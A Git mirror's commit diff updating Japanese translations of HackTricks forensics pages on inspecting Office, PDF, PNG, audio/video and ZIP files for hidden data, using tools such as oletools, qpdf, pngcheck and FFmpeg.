Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-15 01:17:36 +00:00
Code Issues Projects Releases Packages Wiki Activity

Translated ['forensics/basic-forensic-methodology/specific-software-file

Browse source
This commit is contained in:
Translator 2024-02-07 05:47:12 +00:00
parent d24d1f5a7c
commit aaa9582df1
99 changed files with 7831 additions and 8636 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

87
forensics/basic-forensic-methodology/specific-software-file-type-tricks/office-file-analysis.md
View file

@ -6,106 +6,53 @@
HackTricks をサポートする他の方法:
* **HackTricks で企業を宣伝したい**または **HackTricks をPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASSHackTricksのグッズ**](https://peass.creator-spring.com)を入手する
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションを見つける
* **💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)をフォローする
* **ハッキングトリックを共有するために、** [**HackTricks**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出する
- **HackTricks で企業を宣伝したい** または **HackTricks をPDFでダウンロードしたい** 場合は [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) をチェックしてください!
- [**公式PEASSHackTricksスワッグ**](https://peass.creator-spring.com)を入手する
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な [**NFTs**](https://opensea.io/collection/the-peass-family) のコレクションを見つける
- **💬 [Discordグループ](https://discord.gg/hRep4RUj7f)** または [telegramグループ](https://t.me/peass) に **参加** または **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live) を **フォロー** してください。
- **ハッキングトリックを共有するには、** [**HackTricks**](https://github.com/carlospolop/hacktricks) と [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) のGitHubリポジトリにPRを提出してください。
</details>
<figure><img src="../../../.gitbook/assets/image (3) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
\
[**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks)を使用して、世界で最も**高度なコミュニティツール**によって強化された**ワークフローを簡単に構築**および**自動化**します。\
[**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks) を使用して、世界で最も高度なコミュニティツールによって強化された **ワークフローを簡単に構築** および **自動化** できます。\
今すぐアクセスを取得:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
## はじめに
**詳細については [https://trailofbits.github.io/ctf/forensics/](https://trailofbits.github.io/ctf/forensics/) をチェックしてください**
Microsoft は**数十種類のオフィス文書ファイル形式**を作成しており、その多くは**マクロを含む**VBAスクリプトため、**フィッシング攻撃やマルウェアの配布**に人気があります。
Microsoft は多くのオフィス文書形式を作成しており、主なタイプは **OLE形式**RTF、DOC、XLS、PPTなど**Office Open XMLOOXML形式**DOCX、XLSX、PPTXなどです。これらの形式にはマクロが含まれることがあり、それによりフィッシングやマルウェアの標的となります。OOXMLファイルはzipコンテナとして構造化されており、解凍してファイルとフォルダの階層、XMLファイルの内容を表示できます。
大まかに言えば、オフィスファイル形式には2つの世代があります: **OLE形式**RTF、DOC、XLS、PPTなどのファイル拡張子と "**Office Open XML**" 形式DOCX、XLSX、PPTXを含むファイル拡張子。**両方**の形式は、**リンクされたまたは埋め込まれたコンテンツ**オブジェクトを可能にする構造化された複合ファイルバイナリ形式です。OOXMLファイルはzipファイルコンテナであり、隠されたデータをチェックする最も簡単な方法の1つは、単にドキュメントを`unzip`することです。
```
$ unzip example.docx
Archive: example.docx
inflating: [Content_Types].xml
inflating: _rels/.rels
inflating: word/_rels/document.xml.rels
inflating: word/document.xml
inflating: word/theme/theme1.xml
extracting: docProps/thumbnail.jpeg
inflating: word/comments.xml
inflating: word/settings.xml
inflating: word/fontTable.xml
inflating: word/styles.xml
inflating: word/stylesWithEffects.xml
inflating: docProps/app.xml
inflating: docProps/core.xml
inflating: word/webSettings.xml
inflating: word/numbering.xml
$ tree
.
├── [Content_Types].xml
├── _rels
├── docProps
│ ├── app.xml
│ ├── core.xml
│ └── thumbnail.jpeg
└── word
├── _rels
│ └── document.xml.rels
├── comments.xml
├── document.xml
├── fontTable.xml
├── numbering.xml
├── settings.xml
├── styles.xml
├── stylesWithEffects.xml
├── theme
│ └── theme1.xml
└── webSettings.xml
```
如何見ても、ファイルとフォルダの階層構造が作成されています。残りの部分はXMLファイル内で指定されています。[_New Steganographic Techniques for the OOXML File Format_, 2011](http://download.springer.com/static/pdf/713/chp%3A10.1007%2F978-3-642-23300-5\_27.pdf?originUrl=http%3A%2F%2Flink.springer.com%2Fchapter%2F10.1007%2F978-3-642-23300-5\_27\&token2=exp=1497911340\~acl=%2Fstatic%2Fpdf%2F713%2Fchp%25253A10.1007%25252F978-3-642-23300-5\_27.pdf%3ForiginUrl%3Dhttp%253A%252F%252Flink.springer.com%252Fchapter%252F10.1007%252F978-3-642-23300-5\_27\*\~hmac=aca7e2655354b656ca7d699e8e68ceb19a95bcf64e1ac67354d8bca04146fd3d) はデータ隠蔽技術のいくつかのアイデアを詳細に説明していますが、CTFチャレンジの作成者は常に新しいアイデアを考え出しています。
OOXMLファイル構造を探るために、ドキュメントを解凍するコマンドと出力構造が提供されています。これらのファイルにデータを隠す技術が文書化されており、CTFチャレンジ内でのデータの隠蔽に関する革新が続いています。
OLEおよびOOXMLドキュメントの検査と分析のためのPythonツールセットが存在します: [oletools](http://www.decalage.info/python/oletools)。特にOOXMLドキュメントについては、[OfficeDissector](https://www.officedissector.com) が非常に強力な分析フレームワークおよびPythonライブラリです。後者には、[使用方法のクイックガイド](https://github.com/grierforensics/officedissector/blob/master/doc/html/\_sources/txt/ANALYZING\_OOXML.txt) も含まれています。
分析のために、**oletools** と **OfficeDissector** は、OLEおよびOOXMLドキュメントを調査するための包括的なツールセットを提供しています。これらのツールは、埋め込まれたマクロを特定し分析するのに役立ちます。これらのマクロはしばしばマルウェアの配信ベクトルとして機能し、通常は追加の悪意のあるペイロードをダウンロードして実行します。VBAマクロの分析は、Libre Officeを使用してMicrosoft Officeなしで行うことができ、ブレークポイントとウォッチ変数でデバッグが可能です。
時には、隠された静的データを見つけることが課題ではなく、VBAマクロを分析してその動作を判断することが課題となります。これはより現実的なシナリオであり、現場のアナリストが毎日実行する作業の一つです。前述の解析ツールは、マクロの存在を示すことができ、おそらくそれを抽出することもできます。Windows上のOfficeドキュメント内の典型的なVBAマクロは、%TEMP%にPowerShellスクリプトをダウンロードして実行しようとします。この場合、PowerShellスクリプトの分析タスクも発生します。しかし、悪意のあるVBAマクロはめったに複雑ではありません。なぜなら、VBAは通常、コード実行の起点として使用されるだけだからです。複雑なVBAマクロを理解する必要がある場合や、マクロが難読化されておりアンパッカールーチンを持っている場合、Microsoft Officeのライセンスを所有している必要はありません。[Libre Office](http://libreoffice.org)を使用できます。[そのインターフェース](http://www.debugpoint.com/2014/09/debugging-libreoffice-macro-basic-using-breakpoint-and-watch/) は、プログラムのデバッグを行ったことがある人にとって馴染み深いものです。ブレークポイントを設定し、ウォッチ変数を作成し、アンパックされた後の値をキャプチャし、ペイロードの動作が実行される前に値を取得することができます。特定のドキュメントのマクロをコマンドラインから実行することさえできます。
```
$ soffice path/to/test.docx macro://./standard.module1.mymacro
```
## [oletools](https://github.com/decalage2/oletools)
**oletools** のインストールと使用は簡単で、pipを使用してインストールするコマンドが提供されています。`AutoOpen`、`AutoExec`、または `Document_Open` などの関数によって、マクロの自動実行がトリガーされます。
```bash
sudo pip3 install -U oletools
olevba -c /path/to/document #Extract macros
```
## 自動実行
`AutoOpen`、`AutoExec`、`Document_Open`などのマクロ関数は**自動的に****実行**されます。
## 参考
* [https://trailofbits.github.io/ctf/forensics/](https://trailofbits.github.io/ctf/forensics/)
<figure><img src="../../../.gitbook/assets/image (3) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
\
[**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks)を使用して、世界で**最も高度な**コミュニティツールによって**強化された**ワークフローを簡単に構築し、**自動化**します。\
[**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks)を使用して、世界で最も先進的なコミュニティツールによって強化された**ワークフローを簡単に構築**および**自動化**します。\
今すぐアクセスしてください:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
<details>
<summary><strong>**ゼロからヒーローまでのAWSハッキングを学ぶ**</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong></strong></summary>
<summary><strong>**htARTE (HackTricks AWS Red Team Expert)**でAWSハッキングをゼロからヒーローまで学ぶ</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
HackTricksをサポートする他の方法
* **HackTricksで企業を宣伝したい**または**HackTricksをPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* **HackTricksで企業を宣伝**したい場合や**HackTricksをPDFでダウンロード**したい場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASSHackTricksのグッズ**](https://peass.creator-spring.com)を入手してください
* 独占的な[NFTs](https://opensea.io/collection/the-peass-family)コレクションである[**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見する
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**Telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**フォロー**してください。
* **HackTricks**と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出して、あなたのハッキングトリックを共有してください。
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションを見つけてください
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**をフォロー**してください。
* **HackTricks**と**HackTricks Cloud**のgithubリポジトリにPRを提出して、あなたのハッキングトリックを共有してください。
</details>

37
forensics/basic-forensic-methodology/specific-software-file-type-tricks/pdf-file-analysis.md
View file

@ -2,14 +2,14 @@
<details>
<summary><strong>htARTEHackTricks AWS Red Team Expert</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>通じてゼロからヒーローまでAWSハッキングを学ぶ</strong></a><strong></strong></summary>
<summary><strong>htARTEHackTricks AWS Red Team Expert</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>でAWSハッキングをゼロからヒーローまで学ぶ</strong></a><strong></strong></summary>
HackTricksをサポートする他の方法
- **HackTricksで企業を宣伝したい**または**PDFでHackTricksをダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
- **HackTricksで企業を宣伝したい**場合や**PDFでHackTricksをダウンロード**したい場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
- [**公式PEASSHackTricksスウェグ**](https://peass.creator-spring.com)を入手する
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションを見る
- **💬 [Discordグループ](https://discord.gg/hRep4RUj7f)**に参加するか、[telegramグループ](https://t.me/peass)に参加するか、**Twitter**で**@hacktricks_live**をフォローする🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)****
- **Discordグループ**に参加する💬](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に参加するか、**Twitter**で**@hacktricks_live**をフォローする🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
- **ハッキングトリックを共有するには、**[**HackTricks**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出してください。
</details>
@ -18,40 +18,35 @@ HackTricksをサポートする他の方法
\
[**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks)を使用して、世界で最も高度なコミュニティツールによって強化された**ワークフローを簡単に構築**および**自動化**します。\
今すぐアクセス:
今すぐアクセスしてください
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
出典:[https://trailofbits.github.io/ctf/forensics/](https://trailofbits.github.io/ctf/forensics/)
**詳細については、[https://trailofbits.github.io/ctf/forensics/](https://trailofbits.github.io/ctf/forensics/)をチェックしてください**
PDFは非常に複雑なドキュメントファイル形式であり、数年間にわたって書くための十分なトリックや隠し場所があります。これはCTFフォレンジックチャレンジでも人気があります。NSAは2008年に「Adobe PDFファイルの隠しデータとメタデータ公開リスクと対策」と題したガイドを作成しました。元のURLではもう入手できませんが、[こちらでコピーを見つけることができます](http://www.itsecure.hu/library/file/Biztons%C3%A1gi%20%C3%BAtmutat%C3%B3k/Alkalmaz%C3%A1sok/Hidden%20Data%20and%20Metadata%20in%20Adobe%20PDF%20Files.pdf)。Ange AlbertiniはGitHubで[PDFファイル形式のトリック](https://github.com/corkami/docs/blob/master/PDF/PDF.md)のウィキを保持しています。
PDF形式は、データを隠す可能性が高い複雑さで知られており、CTFフォレンジックチャレンジの焦点となっています。プレーンテキスト要素とバイナリオブジェクトを組み合わせ、圧縮されたり暗号化されたりする可能性があり、JavaScriptやFlashなどの言語でスクリプトを含むことができます。PDFの構造を理解するためには、Didier Stevensの[入門資料](https://blog.didierstevens.com/2008/04/09/quickpost-about-the-physical-and-logical-structure-of-pdf-files/)を参照するか、テキストエディタやOrigamiなどのPDF固有のエディタを使用することができます。
PDF形式は部分的にプレーンテキストであり、HTMLのようなものですが、内容には多くのバイナリ「オブジェクト」が含まれています。Didier Stevensは、その形式について[良い入門資料](https://blog.didierstevens.com/2008/04/09/quickpost-about-the-physical-and-logical-structure-of-pdf-files/)を書いています。バイナリオブジェクトには、圧縮されたり暗号化されたりするデータが含まれることがあり、JavaScriptやFlashなどのスクリプト言語でのコンテンツも含まれます。PDFの構造を表示するには、テキストエディタで閲覧するか、OrigamiのようなPDF認識ファイル形式エディタで開くことができます。
PDFの詳細な探索や操作には、[qpdf](https://github.com/qpdf/qpdf)や[Origami](https://github.com/mobmewireless/origami-pdf)などのツールが利用可能です。PDF内の隠されたデータは、次のように隠されている可能性があります
[qpdf](https://github.com/qpdf/qpdf)は、PDFを探索し、情報を変換したり抽出したりするのに役立つツールの1つです。別のツールとして、Rubyのフレームワークである[Origami](https://github.com/mobmewireless/origami-pdf)があります。
隠しデータを探るためにPDFコンテンツを探索する際にチェックすべき隠し場所には、次のものがあります
- 非表示のレイヤー
- Adobeのメタデータ形式「XMP」
- PDFの「増分生成」機能、以前のバージョンが保持されているがユーザーには表示されない
- 白地に白色のテキスト
- 画像の後ろのテキスト
- 画像の上に重なる画像
- 不可視のレイヤー
- AdobeのXMPメタデータ形式
- インクリメンタルジェネレーション
- 背景と同じ色のテキスト
- 画像の後ろや画像の上にあるテキスト
- 非表示のコメント
PDFファイル形式で作業するためのいくつかのPythonパッケージもあり、[PeepDF](https://github.com/jesparza/peepdf)のようなパッケージを使用して独自の解析スクリプトを作成できます。
カスタムPDF分析のためには、[PeepDF](https://github.com/jesparza/peepdf)などのPythonライブラリを使用して、独自の解析スクリプトを作成できます。さらに、PDFが隠されたデータを格納する可能性が非常に広範囲であるため、PDFのリスクと対策に関するNSAガイドなどのリソースは、元の場所でホストされていないものの、貴重な洞察を提供しています。[ガイドのコピー](http://www.itsecure.hu/library/file/Biztons%C3%A1gi%20%C3%BAtmutat%C3%B3k/Alkalmaz%C3%A1sok/Hidden%20Data%20and%20Metadata%20in%20Adobe%20PDF%20Files.pdf)やAnge Albertiniによる[PDF形式のトリック](https://github.com/corkami/docs/blob/master/PDF/PDF.md)のコレクションは、このトピックに関するさらなる読書を提供できます。
<details>
<summary><strong>htARTEHackTricks AWS Red Team Expert</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>通じてゼロからヒーローまでAWSハッキングを学ぶ</strong></a><strong></strong></summary>
<summary><strong>htARTEHackTricks AWS Red Team Expert</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>でAWSハッキングをゼロからヒーローまで学ぶ</strong></a><strong></strong></summary>
HackTricksをサポートする他の方法
- **HackTricksで企業を宣伝したい**または**PDFでHackTricksをダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
- **HackTricksで企業を宣伝したい**場合や**PDFでHackTricksをダウンロード**したい場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
- [**公式PEASSHackTricksスウェグ**](https://peass.creator-spring.com)を入手する
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションを見る
- **💬 [Discordグループ](https://discord.gg/hRep4RUj7f)**に参加するか、[telegramグループ](https://t.me/peass)に参加するか、**Twitter**で**@hacktricks_live**をフォローする🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)****
- **Discordグループ**に参加する💬](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に参加するか、**Twitter**で**@hacktricks_live**をフォローする🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
- **ハッキングトリックを共有するには、**[**HackTricks**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出してください。
</details>

21
forensics/basic-forensic-methodology/specific-software-file-type-tricks/png-tricks.md
View file

@ -4,18 +4,19 @@
HackTricksをサポートする他の方法
* **HackTricksで企業を宣伝したい**または**HackTricksをPDFでダウンロードしたい場合**は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASSHackTricksグッズ**](https://peass.creator-spring.com)を入手する
* **HackTricksで企業を宣伝したい**または**HackTricksをPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASSHackTricksグッズ**](https://peass.creator-spring.com)を入手する
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションを見る
* **💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)に参加するか、[**telegramグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)をフォローする**
* **ハッキングトリックを共有するためにPRを** [**HackTricks**](https://github.com/carlospolop/hacktricks) **および** [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **のGitHubリポジトリに提出する**
* **💬 [Discordグループ](https://discord.gg/hRep4RUj7f)**に参加するか、[telegramグループ](https://t.me/peass)に参加するか、**Twitter**で**@hacktricks_live**をフォローする
* **HackTricks**と**HackTricks Cloud**のgithubリポジトリにPRを提出して、あなたのハッキングテクニックを共有する
</details>
**PNGファイル**は、**CTFチャレンジ**で高く評価されており、**非可逆圧縮**により、隠しデータを埋め込むのに最適です。**Wireshark**のようなツールは、PNGファイルの解析を可能にし、ネットワークパケット内のデータを解析して埋め込まれた情報や異常を明らかにします。
PNGファイルは、CTFチャレンジで特に人気があり、画像内に非表示データを隠すのに適した無損失圧縮のためかもしれません。PNGファイルはWiresharkで解析できます。破損したPNGを検証するか修復しようとする場合は、[pngcheck](http://libpng.org/pub/png/apps/pngcheck.html)を使用できます。
PNGファイルの整合性をチェックし、破損を修復するために、**pngcheck**は重要なツールであり、PNGファイルを検証および診断するためのコマンドライン機能を提供します[pngcheck](http://libpng.org/pub/png/apps/pngcheck.html))。ファイルが単純な修復を超える場合、[OfficeRecoveryのPixRecovery](https://online.officerecovery.com/pixrecovery/)のようなオンラインサービスは、**破損したPNGの修復**のためのWebベースのソリューションを提供し、CTF参加者のために重要なデータの回復を支援します。
オンラインツールを使用して破損したPNGを修復することもできます。[https://online.officerecovery.com/pixrecovery/](https://online.officerecovery.com/pixrecovery/)を参照してください
これらの戦略は、CTFで包括的なアプローチの重要性を強調し、分析ツールと修復技術の組み合わせを活用して、隠されたデータや失われたデータを発見および回復することを目指します
<details>
@ -23,10 +24,10 @@ PNGファイルは、CTFチャレンジで特に人気があり、画像内に
HackTricksをサポートする他の方法
* **HackTricksで企業を宣伝したい**または**HackTricksをPDFでダウンロードしたい場合**は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASSHackTricksグッズ**](https://peass.creator-spring.com)を入手する
* **HackTricksで企業を宣伝したい**または**HackTricksをPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASSHackTricksグッズ**](https://peass.creator-spring.com)を入手する
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションを見る
* **💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)に参加するか、[**telegramグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)をフォローする**
* **ハッキングトリックを共有するためにPRを** [**HackTricks**](https://github.com/carlospolop/hacktricks) **および** [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **のGitHubリポジトリに提出する**
* **💬 [Discordグループ](https://discord.gg/hRep4RUj7f)**に参加するか、[telegramグループ](https://t.me/peass)に参加するか、**Twitter**で**@hacktricks_live**をフォローする
* **HackTricks**と**HackTricks Cloud**のgithubリポジトリにPRを提出して、あなたのハッキングテクニックを共有する
</details>

24
forensics/basic-forensic-methodology/specific-software-file-type-tricks/video-and-audio-file-analysis.md
View file

@ -1,28 +1,28 @@
<details>
<summary><strong>htARTEHackTricks AWS Red Team Expert</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>を通じてゼロからヒーローまでAWSハッキングを学ぶ</strong></a><strong></strong></summary>
<summary><strong>ゼロからヒーローまでのAWSハッキングを学ぶ</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong></strong></summary>
HackTricksをサポートする他の方法
* **HackTricksで企業を宣伝したい**または**HackTricksをPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASSHackTricksスワッグ**](https://peass.creator-spring.com)を入手する
* [**公式PEASSHackTricksグッズ**](https://peass.creator-spring.com)を入手する
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションを見る
* **💬 [Discordグループ](https://discord.gg/hRep4RUj7f)**に参加するか、[telegramグループ](https://t.me/peass)に参加するか、**Twitter** 🐦で**フォロー**する:[**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **ハッキングトリックを共有するには、[HackTricks](https://github.com/carlospolop/hacktricks)と[HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出してください。**
* **💬 [Discordグループ](https://discord.gg/hRep4RUj7f)**に参加するか、[telegramグループ](https://t.me/peass)に参加するか、**Twitter** 🐦で**フォロー**する:[**@hacktricks_live**](https://twitter.com/hacktricks_live)****
* **ハッキングトリックを共有するには、**[**HackTricks**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出してください。
</details>
**オーディオおよびビデオファイルの操作**は、**CTFフォレンジックチャレンジ**での主要な要素であり、**ステガノグラフィ**やメタデータ解析を活用して秘密のメッセージを隠したり明らかにしたりします。**[mediainfo](https://mediaarea.net/en/MediaInfo)**や**`exiftool`**などのツールは、ファイルのメタデータを検査しコンテンツタイプを特定するために不可欠です。
From: [https://trailofbits.github.io/ctf/forensics/](https://trailofbits.github.io/ctf/forensics/)
オーディオチャレンジでは、**[Audacity](http://www.audacityteam.org/)**が波形の表示やスペクトログラムの分析に優れたツールとして際立っており、オーディオにエンコードされたテキストを発見するのに必須です。**[Sonic Visualiser](http://www.sonicvisualiser.org/)**は、詳細なスペクトログラム分析に非常に適しています。**Audacity**は、隠されたメッセージを検出するためにトラックを遅くしたり逆再生したりするなど、オーディオの操作を可能にします。**[Sox](http://sox.sourceforge.net/)**は、オーディオファイルの変換や編集に優れたコマンドラインユーティリティです。
画像ファイル形式と同様に、オーディオおよびビデオファイルのトリックは、現実世界でハッキングやデータの隠蔽がこの方法で行われるわけではないためではなく、単にオーディオとビデオが楽しいからです。画像ファイル形式と同様に、ステガノグラフィを使用してコンテンツデータに秘密のメッセージを埋め込むことがあり、再び、手がかりを見つけるためにファイルのメタデータ領域をチェックする必要があります。最初のステップは、[mediainfo](https://mediaarea.net/en/MediaInfo)ツール(または`exiftool`)を使用してコンテンツタイプを識別し、そのメタデータを確認することです。
**最下位ビットLSB**の操作は、オーディオおよびビデオステガノグラフィで一般的な技術であり、メディアファイルの固定サイズのチャンクを利用してデータを控え目に埋め込みます。**[Multimon-ng](http://tools.kali.org/wireless-attacks/multimon-ng)**は、**DTMFトーン**や**モールス符号**として隠されたメッセージをデコードするのに役立ちます。
[Audacity](http://www.audacityteam.org/)は、主要なオープンソースのオーディオファイルおよび波形表示ツールです。CTFのチャレンジ作成者は、テキストをオーディオ波形にエンコードすることが好きで、これはスペクトログラムビューを使用して見ることができます専用のツールである[Sonic Visualiser](http://www.sonicvisualiser.org/)が特にこのタスクには向いています)。 Audacityを使用すると、隠されたメッセージがあると疑う場合に、スローダウン、逆再生、および他の操作を行うことができ、隠されたメッセージが明らかになるかもしれませんガーブル音、干渉、または静的イズが聞こえる場合。 [Sox](http://sox.sourceforge.net/)は、オーディオファイルの変換や操作に役立つ別の便利なコマンドラインツールです。
ビデオチャレンジでは、オーディオとビデオストリームをバンドルするコンテナ形式がしばしば使用されます。**[FFmpeg](http://ffmpeg.org/)**は、これらの形式を分析および操作するための必須ツールであり、デマルチプレクシングやコンテンツの再生が可能です。開発者向けには、**[ffmpy](http://ffmpy.readthedocs.io/en/latest/examples.html)**が、Pythonでの高度なスクリプト可能なインタラクションにFFmpegの機能を統合しています。
また、秘密のメッセージをチェックするために最も下位ビットLSBをチェックすることも一般的です。ほとんどのオーディオおよびビデオメディア形式は、ストリーミングできるように固定サイズの「チャンク」を使用しているため、これらのチャンクのLSBは、ファイルに目に見える影響を与えずにデータを隠す一般的な場所です。
これらのツールの配列は、CTFチャレンジで必要とされる多様性を示しており、参加者はオーディオおよびビデオファイル内の隠されたデータを発見するために幅広い分析および操作技術を駆使する必要があります。
他の場合、メッセージはオーディオに[DTMFトーン](http://dialabc.com/sound/detect/index.html)やモールス信号としてエンコードされている場合があります。これらの場合は、[multimon-ng](http://tools.kali.org/wireless-attacks/multimon-ng)を使用してデコードしてみてください。
# 参考文献
* [https://trailofbits.github.io/ctf/forensics/](https://trailofbits.github.io/ctf/forensics/)
ビデオファイル形式はコンテナ形式であり、再生のためにオーディオとビデオの別々のストリームが多重化されて含まれています。ビデオファイル形式を分析および操作するには、[FFmpeg](http://ffmpeg.org/)が推奨されています。 `ffmpeg -i`はファイルコンテンツの初期分析を提供します。また、コンテンツストリームをデマルチプレックス化したり再生したりすることもできます。 FFmpegの機能は、[ffmpy](http://ffmpy.readthedocs.io/en/latest/examples.html)を使用してPythonに公開されています。
</details>
<details>

29
forensics/basic-forensic-methodology/specific-software-file-type-tricks/zips-tricks.md
View file

@ -6,26 +6,25 @@
HackTricksをサポートする他の方法
- **HackTricksで企業を宣伝したい**場合や**HackTricksをPDFでダウンロード**したい場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
- [**公式PEASSHackTricksグッズ**](https://peass.creator-spring.com)を入手する
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションを見つける
- **HackTricksで企業を宣伝したい**または**HackTricksをPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
- [**公式PEASSHackTricksスウォッグ**](https://peass.creator-spring.com)を入手する
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFT**](https://opensea.io/collection/the-peass-family)のコレクションを見つける
- **💬 [Discordグループ](https://discord.gg/hRep4RUj7f)**に参加するか、[telegramグループ](https://t.me/peass)に参加するか、**Twitter** 🐦で私たちをフォローする [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。**
- **ハッキングトリックを共有するには、[HackTricks](https://github.com/carlospolop/hacktricks)と[HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出してください。**
- **ハッキングトリックを共有するには、** [**HackTricks**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出してください。
</details>
